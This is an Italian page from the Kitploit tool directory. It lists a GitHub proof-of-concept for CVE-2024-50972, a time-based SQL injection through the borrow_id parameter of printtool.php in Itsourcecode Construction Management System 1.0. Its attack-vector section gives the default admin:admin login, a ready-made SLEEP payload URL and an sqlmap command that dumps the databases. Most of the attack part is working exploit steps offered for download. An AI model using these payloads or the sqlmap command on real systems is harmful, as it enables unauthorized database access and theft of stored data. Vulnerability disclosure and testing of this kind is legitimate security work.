Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-50972 — Proof-of-concept per SQL injection in Itsourcecode Construction Management System 1.0, che dimostra l'iniezione basata sul tempo tramite il parametro borrow_id e fornisce passaggi di sfruttamento. | Kitploit
Strumenti/GitHubGitHub/akhlak2511/cve-2024-50972
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHubakhlak2511/cve-2024-50972

CVE-2024-50972

Proof-of-concept per SQL injection in Itsourcecode Construction Management System 1.0, che dimostra l'iniezione basata sul tempo tramite il parametro borrow_id e fornisce passaggi di sfruttamento.

Vedi Repository
31 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-50972

Descrizione

Una vulnerabilità di SQL injection in printtool.php di Itsourcecode Construction Management System 1.0 consente a utenti malintenzionati remoti di eseguire comandi SQL arbitrari tramite il parametro borrow_id.

Tipo di vulnerabilità

Iniezione SQL

Fornitore del prodotto

Itsourcecode

Base del codice del prodotto interessato:

https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0

Componente interessato:

Itsourcecode Construction Management System v1.0 è vulnerabile a SQL injection tramite il parametro borrow_id nella pagina printtool.php

Vettori di attacco:

  1. Imposta l'applicazione localmente e accedi con le credenziali admin:admin
  • Naviga al seguente URL nel tuo browser: http://localhost/monitoring_system/printtool.php?borrow_id=5
  • Inietta il payload SQL: Modifica il parametro borrow_id nell'URL per includere un payload di SQL injection basato sul tempo. http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
  • Osserva la risposta dell'applicazione: La pagina dovrebbe impiegare notevolmente più tempo (20 secondi) per caricarsi se l'iniezione ha successo, confermando che il parametro borrow_id è vulnerabile a SQL injection.
  • Ora usa lo strumento SQLMap per un ulteriore sfruttamento e dumping dei database usando il comando seguente: sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
  • Riferimenti:

    1. https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
    2. https://owasp.org/www-community/attacks/SQL_Injection
    Scarica lo strumento